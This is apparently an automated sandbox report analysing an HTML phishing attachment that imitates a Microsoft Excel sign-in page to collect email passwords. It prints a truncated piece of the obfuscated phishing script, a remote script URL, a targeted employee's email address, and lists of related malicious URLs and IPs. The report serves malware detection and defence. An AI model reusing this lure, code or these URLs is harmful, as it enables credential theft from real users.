Edit tour

Windows Analysis Report
PAYMENT INV-132_71.html

Overview

General Information

Sample name:	PAYMENT INV-132_71.html
Analysis ID:	1467979
MD5:	7734453d6bf806540a15febe0f313efb
SHA1:	058cad214269377a15b56e175481571cf9716119
SHA256:	0f100e29273db8f3d50ac37f148e1f32ed6ad02e45af5440a14b37a7c25f52dc
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

HTML sample is only containing javascript code

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML title does not match URL

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\PAYMENT INV-132_71.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2004,i,9490730442077993374,16922931335629427452,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

LLM: Score: 9 brands: Microsoft Office Excel Reasons: The URL 'file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html' is a local file path, which is highly suspicious for a legitimate login page. The image shows a login form asking for email and password, which is a common phishing technique. The brand name 'Microsoft Office Excel' is used, but the URL does not match the legitimate domain 'office.com'. There is no CAPTCHA present, which is often used on legitimate login pages for security. The presence of a prominent login form and the use of social engineering techniques (e.g., mimicking a legitimate brand) further indicate that this is a phishing site. DOM: 0.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Detected javascript redirector / loader

Source: PAYMENT INV-132_71.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

Tab title: Protected File Sign In

HTML sample is only containing javascript code

Source: PAYMENT INV-132_71.html

HTTP Parser: <script>var assignDOCto = "kshyam@moog.com";const aY1={w1y:'PC',b1e:'h0',e14:";",v1x:'I+',l27:'at',s18:'cm',g17:'Nj',s2h:'nt',x1n:'Rp',h1d:'Im',y1a:'dC',j1l:'Fs',t16:'PH',n1r:'wv',x2j:'r',f1i:'Ym',d1m:'YW',h1k:'Z2',i2b:'es',g21:'Jp',f29:'b',m2c:'c',m...

Phishing site detected (based on logo match)

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

Matcher: Template: excel matched

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: Title: Protected File Sign In does not match URL

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: <input type="password" .../> found

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49756 version: TLS 1.2

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172

Source: global traffic	HTTP traffic detected: GET /wpfd.js HTTP/1.1Host: bengaladigital.clConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C8Pm4s9BsHOlOsb&MD=NO+3KBGm HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C8Pm4s9BsHOlOsb&MD=NO+3KBGm HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: bengaladigital.cl
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49756 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: PAYMENT INV-132_71.html

Initial sample: payment

Source: classification engine

Classification label: mal84.phis.winHTML@26/5@4/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\PAYMENT INV-132_71.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2004,i,9490730442077993374,16922931335629427452,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2004,i,9490730442077993374,16922931335629427452,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

HTTP Parser: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bengaladigital.cl	0%	Virustotal		Browse
www.google.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://bengaladigital.cl/wpfd.js	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bengaladigital.cl	162.241.61.68	true	false	0%, Virustotal, Browse	unknown
www.google.com	216.58.206.36	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html	true	Avira URL Cloud: safe	unknown
https://bengaladigital.cl/wpfd.js	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
162.241.61.68	bengaladigital.cl	United States	46606	UNIFIEDLAYER-AS-1US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467979
Start date and time:	2024-07-05 07:57:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PAYMENT INV-132_71.html
Detection:	MAL
Classification:	mal84.phis.winHTML@26/5@4/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.131, 172.217.23.110, 66.102.1.84, 34.104.35.123, 142.250.185.106, 172.217.18.10, 142.250.184.202, 142.250.185.202, 142.250.185.170, 142.250.186.106, 142.250.74.202, 216.58.206.42, 142.250.186.42, 172.217.16.202, 142.250.186.170, 142.250.185.138, 142.250.186.138, 142.250.181.234, 216.58.212.170, 142.250.185.234, 216.58.206.74, 142.250.186.74, 142.250.185.74, 172.217.18.106, 216.58.212.138, 142.250.184.234, 172.217.23.106, 95.101.54.200, 192.229.221.95, 142.250.186.163, 142.250.184.206
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, firebasestorage.googleapis.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": true,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text creates a sense of urgency by using phrases like 'Protected File Sign In' and 'Download'."]}
Title: Protected File Sign In OCR: Microsoft Office Excel Sign In your email provider organization to access Doc. kshyam@moog.com Password Download
URL: file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft Office Excel", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "office.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/PAYMENT%20INV-132_71.html' is a local file path, which is highly suspicious for a legitimate login page. The image shows a login form asking for email and password, which is a common phishing technique. The brand name 'Microsoft Office Excel' is used, but the URL does not match the legitimate domain 'office.com'. There is no CAPTCHA present, which is often used on legitimate login pages for security. The presence of a prominent login form and the use of social engineering techniques (e.g., mimicking a legitimate brand) further indicate that this is a phishing site."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=	Get hash	malicious	HTMLPhisher	Browse
	https://rb.gy/zsqpja	Get hash	malicious	HTMLPhisher	Browse
	https://singingfiles.com/show.php?l=0&u=2156442&id=64574	Get hash	malicious	Unknown	Browse
	https://metamesklogni.webflow.io/	Get hash	malicious	Unknown	Browse
	https://rules-pear-kft5d2.mystrikingly.com/	Get hash	malicious	Unknown	Browse
	http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12	Get hash	malicious	Unknown	Browse
	https://sula.starladeroff.com/	Get hash	malicious	Unknown	Browse
	https://scm.ci/cgi-bin/redirect.php	Get hash	malicious	Unknown	Browse
	https://steaemcoonmmunnltly.com/g-friend/golo/gifts-50	Get hash	malicious	Unknown	Browse
	http://danakaget.sekarang.xyz/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	E-INVOICE.xls	Get hash	malicious	Unknown	Browse	192.185.89.92
	E-INVOICE.xls	Get hash	malicious	Unknown	Browse	192.185.89.92
	M.V TBN - VESSEL'S DETAILS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	PO#RSB-8927393_2324.exe	Get hash	malicious	FormBook	Browse	162.241.216.26
	SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	80TeZdsbeA6B6j4.exe	Get hash	malicious	FormBook	Browse	50.87.148.119
	https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk	Get hash	malicious	HTMLPhisher	Browse	108.167.151.63
	PMcyGpR57k.elf	Get hash	malicious	Unknown	Browse	74.91.234.112
	ztGOiA742S.elf	Get hash	malicious	Unknown	Browse	142.5.50.93
	Purchase order No. 1073 xls.wsf	Get hash	malicious	Unknown	Browse	192.185.76.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://rb.gy/zsqpja	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 184.28.90.27
	https://singingfiles.com/show.php?l=0&u=2156442&id=64574	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://metamesklogni.webflow.io/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://scm.ci/cgi-bin/redirect.php	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 184.28.90.27
	http://services.business-manange.com/	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 184.28.90.27
	http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.html	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 184.28.90.27
	http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.html	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	http://www.anuihafw369.xyz/m/register/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoors	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 184.28.90.27

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1124 x 1092, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	224363
Entropy (8bit):	7.974877424694327
Encrypted:	false
SSDEEP:	6144:dpAcnxfsXVqMsYbeJGBPefRj9+X8JJbpzxozz7Ym:rRWzecBIx+X8Rxy7Ym
MD5:	698033029B788095FA346766AC46CD58
SHA1:	74E4DD1ABBAC9DF93F2D43806F3C85888F92DCEF
SHA-256:	9A43F3B3DF604D45D74DA7543B98E2942A9F68781954E6C84444A04AEEC09FB1
SHA-512:	50EA37FE435167548FB2C5A4BDB0819236FB00D67BED9AD81727B5CCB99EFC4F38F68A4771C9250A3DB14B4C4750CB2EADC4CFAFE629C10BABC4EEFEF9D137A2
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...d...D.....3......KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about=""/>. </rdf:RDF>.</x:xmpmeta>.<?xpacket end="r"?> I.:.. .IDATx....$Gy.......^.k/....6..cL.Q..> ....l..k..........).L0..m......}I.+..kXb..e...........O.....9...yI......k.z.P.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.E.d..(..(.o.>...r...\`.n.o....B.CQ.EQ...BFQ.EQ....N...Ocnn.BwE.....7.t.....Q.EQ.K...(..(....>g^\|.E...b~~.BwG..T.U,,,\.n(..(.......EQ.EQ.y....S.0;;.8./tw.....U.:u.w.y.F;+..(.%.~.+..(.&...~..t6.Nk-...q....>}..O.F....6.K...1\u.U.611..m..u\|...!Q..(.r.P!.(..(..=..c.}

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1124 x 1092, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	224363
Entropy (8bit):	7.974877424694327
Encrypted:	false
SSDEEP:	6144:dpAcnxfsXVqMsYbeJGBPefRj9+X8JJbpzxozz7Ym:rRWzecBIx+X8Rxy7Ym
MD5:	698033029B788095FA346766AC46CD58
SHA1:	74E4DD1ABBAC9DF93F2D43806F3C85888F92DCEF
SHA-256:	9A43F3B3DF604D45D74DA7543B98E2942A9F68781954E6C84444A04AEEC09FB1
SHA-512:	50EA37FE435167548FB2C5A4BDB0819236FB00D67BED9AD81727B5CCB99EFC4F38F68A4771C9250A3DB14B4C4750CB2EADC4CFAFE629C10BABC4EEFEF9D137A2
Malicious:	false
Reputation:	low
URL:	https://firebasestorage.googleapis.com/v0/b/png-images-481bb.appspot.com/o/excellogo.png?alt=media&token=2339dbb3-40e5-45a2-a262-9bc9936edbc8
